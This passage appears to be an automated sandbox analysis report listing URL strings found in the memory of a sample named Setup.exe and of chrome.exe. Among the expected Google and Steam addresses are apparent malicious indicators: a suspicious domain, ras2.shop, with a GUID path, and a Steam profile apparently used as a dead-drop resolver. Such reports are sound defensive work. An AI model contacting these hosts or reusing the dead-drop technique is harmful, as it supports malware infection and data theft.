Source: chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952700993.0000620403134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953393315.00006204030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950780851.00006204030B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953155697.00006204030D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952700993.0000620403134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953393315.00006204030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950780851.00006204030B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953155697.00006204030D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000002.00000002.2946845031.00006204012F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944153810.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945878965.0000620400F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943829758.0000620400AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2947000070.0000620401338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944969889.0000620400D4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944117568.0000620400BAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944906788.0000620400D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944940201.0000620400D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1941816283.000062040272C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1914174727.0000620400C99000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942524679.00006204007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2947031287.0000620401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944602173.0000620400C99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000002.00000002.2943829758.0000620400AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912308493.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944940201.0000620400D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1941816283.000062040272C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1914174727.0000620400C99000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944602173.0000620400C99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000002.00000002.2943829758.0000620400AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944906788.0000620400D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1941816283.000062040272C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1914174727.0000620400C99000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944602173.0000620400C99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000002.00000003.1912308493.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944906788.0000620400D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944940201.0000620400D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1941816283.000062040272C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1914174727.0000620400C99000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939659737.00006204002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944602173.0000620400C99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000002.00000003.1912308493.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944906788.0000620400D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944940201.0000620400D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1941816283.000062040272C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1914174727.0000620400C99000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944602173.0000620400C99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000002.00000002.2944844400.0000620400D00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945878965.0000620400F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944480980.0000620400C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2947000070.0000620401338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944969889.0000620400D4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942239090.0000620400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2947031287.0000620401350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1730127919&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000002.00000002.2944480980.0000620400C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2947000070.0000620401338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944969889.0000620400D4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942239090.0000620400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944940201.0000620400D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939659737.00006204002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943472168.00006204009E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1730127962&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000002.00000002.2944691280.0000620400CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2270179713.0000620403368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945878965.0000620400F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944969889.0000620400D4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944117568.0000620400BAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2951057505.0000620403355000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945979193.0000620400F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2947031287.0000620401350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1730214257&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 00000002.00000002.2943829758.0000620400AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912308493.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944940201.0000620400D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1941816283.000062040272C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1914174727.0000620400C99000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944602173.0000620400C99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000002.00000002.2943829758.0000620400AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912308493.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944906788.0000620400D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944940201.0000620400D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1941816283.000062040272C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1914174727.0000620400C99000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944602173.0000620400C99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000002.00000002.2945596285.0000620400E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2947061655.000062040136C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2241713096.000062040272E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2949502077.000062040272E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2947031287.0000620401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2161819487.000062040272E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetModels?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Source: chrome.exe, 00000002.00000002.2943318938.00006204009B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943277729.0000620400974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000002.00000002.2944117568.0000620400BAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945559398.0000620400E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943628788.0000620400A34000.00000004.00000800.00020000.00000000.sdmp, chromecache_76.6.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000002.00000002.2944117568.0000620400BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=trueb
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: chrome.exe, 00000002.00000002.2943318938.00006204009B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943277729.0000620400974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: Setup.exe, 00000000.00000003.1858148873.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000A85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop
Source: Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop/
Source: Setup.exe, 00000000.00000002.2277405706.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop/Ok
Source: Setup.exe, 00000000.00000002.2277405706.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop/Up
Source: Setup.exe, 00000000.00000002.2277405706.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop/Up;
Source: Setup.exe, 00000000.00000003.1858148873.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858148873.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371
Source: Setup.exe, 00000000.00000003.1858148873.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371/
Source: Setup.exe, 00000000.00000003.1858148873.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop/ujs/f1575b64-8492-4e8b-b102-4d26e8c703718
Source: Setup.exe, 00000000.00000003.1858148873.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371B
Source: Setup.exe, 00000000.00000003.1858148873.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371K
Source: Setup.exe, 00000000.00000003.1858148873.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371g
Source: Setup.exe, 00000000.00000003.1858148873.0000000000A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shop/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371h
Source: Setup.exe, 00000000.00000003.1858148873.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000A85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ras2.shopN
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: chrome.exe, 00000002.00000002.2949751122.00006204029C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win6
Source: chrome.exe, 00000002.00000002.2946374708.00006204010E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.c
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: chrome.exe, 00000002.00000002.2938468818.00006204000AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944720817.0000620400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942524679.00006204007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942648813.000062040080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944720817.0000620400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942524679.00006204007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942648813.000062040080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000002.00000003.1953659120.0000620401C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952249136.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2940317520.0000620400444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858083111.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199680660089
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2280336341.000000000321C000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858148873.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2279973407.0000000003100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680660089
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199680660089/badges
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858083111.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199680660089/inventory/
Source: Setup.exe, 00000000.00000002.2277405706.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680660089EXr
Source: Setup.exe, 00000000.00000003.1858148873.0000000000A72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680660089L
Source: Setup.exe, 00000000.00000002.2280336341.000000000321C000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2279973407.0000000003100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barni
Source: Setup.exe, 00000000.00000002.2280336341.000000000321C000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2279973407.0000000003100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barnif1575b64-8492-4e8b-b102-4d26e8c70371https:
Source: Setup.exe, 00000000.00000002.2280336341.000000000321C000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2279973407.0000000003100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barnir5qt6tMozilla/5.0
Source: Setup.exe, 00000000.00000002.2280336341.000000000321C000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2279973407.0000000003100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barniunknownf
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858148873.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000A72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680660089d
Source: Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680660089dlll
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;e
Source: Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/explore/
